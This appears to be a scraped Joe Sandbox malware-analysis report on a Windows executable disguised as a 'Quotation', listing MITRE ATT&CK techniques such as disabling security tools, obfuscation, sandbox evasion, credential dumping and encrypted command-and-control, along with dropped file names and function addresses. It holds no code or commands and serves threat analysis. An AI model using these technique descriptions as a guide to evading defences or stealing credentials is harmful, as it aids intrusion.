Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PTT Group project - Quotation.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\1-673479

C:\Users\user\AppData\Local\Temp\autC8E0.tmp

C:\Users\user\AppData\Local\Temp\autC92F.tmp

C:\Users\user\AppData\Local\Temp\savager

C:\Users\user\AppData\Local\Temp\ultraradicalism

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
PTT Group project - Quotation.exe

Function 00913B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00914AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00914FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 009793DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00913015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00913041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 009171EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00913A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00913633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00913778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 00872610 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 009139E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 008723B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre